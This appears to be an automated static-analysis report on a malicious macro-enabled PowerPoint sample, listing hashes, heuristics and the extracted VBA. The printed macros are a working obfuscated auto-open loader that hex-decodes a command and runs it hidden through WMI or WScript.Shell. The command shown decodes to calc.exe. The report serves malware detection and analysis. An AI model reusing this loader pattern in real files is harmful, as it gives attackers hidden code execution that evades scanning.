Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 69fa5fd009dade24…

MALICIOUS

Office (OOXML)

Size: 36.5 KB
Created: 2021-10-26 14:18:44 UTC
Authoring application: Microsoft Office PowerPoint 16.0000
First seen: 2021-10-31
MD5: 3b96319ad80e862e152799496e3bbe51
SHA-1: afd02f98c3bfde58be06afa5c1e11e58925cb1f7
SHA-256: 69fa5fd009dade249ddc6e2f2573b49e5fd1ad22d8914c5027209bf4a3bf9430
Risk score: 240

Malware Insights

MITRE ATT&CK
T1059.005 (Visual Basic)
T1204.002 (Malicious File)

The sample contains obfuscated VBA macros, including an AutoOpen function, designed to execute arbitrary commands. Specifically, it uses CreateObject to instantiate 'wscript.shell' and then calls its 'Run' method with a command constructed from hex-encoded strings. The script also attempts to use WMI to create and start a process. This indicates a macro-based downloader or dropper.

Heuristics (6)

  • VBA project inside OOXML [medium] OOXML_VBA (5 related findings)
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call [high] OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2300 bytes
SHA-256: 982b32f374b8578c9f4b7bf7864d42c650ec2733f3a39340d168d9f4004c96b1

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ayngimfsf"
Sub zrnetgsqdtgxkyhvk(pxdgngjg As String)
CreateObject(qlnvgqwsvqjy("57536372") & qlnvgqwsvqjy("6970742e5368656c6c")).Run pxdgngjg, 0
End Sub
Private Function qlnvgqwsvqjy(ByVal shsyrvghdbyt As String) As String
Dim hrtemdoylprt As Long
For hrtemdoylprt = 1 To Len(shsyrvghdbyt) Step 2
qlnvgqwsvqjy = qlnvgqwsvqjy & Chr$(Val("&H" & Mid$(shsyrvghdbyt, hrtemdoylprt, 2)))
Next hrtemdoylprt
End Function


Attribute VB_Name = "izdramsse"
Function glltnsrdzvehqvwv(cmdLine As String) As Integer
Dim laiayviu As Object
Dim wqyxozfonoekxx As Object
Set pgnpnrauteskp = GetObject(dmxzubrftcdr("77696e6d676d74733a5c5c2e5c726f6f745c63696d") & dmxzubrftcdr("7632"))
Set zxhwdbdwcjhgnvr = pgnpnrauteskp.Get(dmxzubrftcdr("57696e33325f50726f63657373537461727475") & dmxzubrftcdr("70"))
Set laiayviu = zxhwdbdwcjhgnvr.SpawnInstance_
laiayviu.ShowWindow = 0
Set wqyxozfonoekxx = GetObject(dmxzubrftcdr("77696e6d676d74733a5c5c2e") & dmxzubrftcdr("5c726f6f745c63696d76323a57696e33325f50726f63657373"))
glltnsrdzvehqvwv = dlolwiqlowtrmf(wqyxozfonoekxx, laiayviu, cmdLine)
End Function
Private Function dlolwiqlowtrmf(opyxekctd As Object, eytkcxni As Object, pqznohjbqzzn As String) As Integer
Dim kgsaoejvooifzhbromjk As Long
dlolwiqlowtrmf = opyxekctd.Create(pqznohjbqzzn, Null, eytkcxni, kgsaoejvooifzhbromjk)
End Function
Private Function dmxzubrftcdr(ByVal fnoqvjszhdih As String) As String
Dim ffosnszynwfg As Long
For ffosnszynwfg = 1 To Len(fnoqvjszhdih) Step 2
dmxzubrftcdr = dmxzubrftcdr & Chr$(Val("&H" & Mid$(fnoqvjszhdih, ffosnszynwfg, 2)))
Next ffosnszynwfg
End Function


Attribute VB_Name = "jibfluanp"
Sub agkqtxodtvzcbmtepo(qcftxijl As String)
On Error Resume Next
Err.Clear
wimResult = glltnsrdzvehqvwv(qcftxijl)
If Err.Number <> 0 Or wimResult <> 0 Then
Err.Clear
zrnetgsqdtgxkyhvk qcftxijl
End If
On Error GoTo 0
End Sub


Attribute VB_Name = "szzjkrodn"
Sub AutoOpen()
agkqtxodtvzcbmtepo xqqirrpeizfb("63616c632e65") & xqqirrpeizfb("7865")
End Sub
Private Function xqqirrpeizfb(ByVal inzklqmbuubx As String) As String
Dim mdhommsbdoho As Long
For mdhommsbdoho = 1 To Len(inzklqmbuubx) Step 2
xqqirrpeizfb = xqqirrpeizfb & Chr$(Val("&H" & Mid$(inzklqmbuubx, mdhommsbdoho, 2)))
Next mdhommsbdoho
End Function

Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: ppt/vbaProject.bin
Size: 15360 bytes
SHA-256: 399a51fd7316eef61e42380b50e8adb4748cbb9b3eb7ae772e197de0e715db98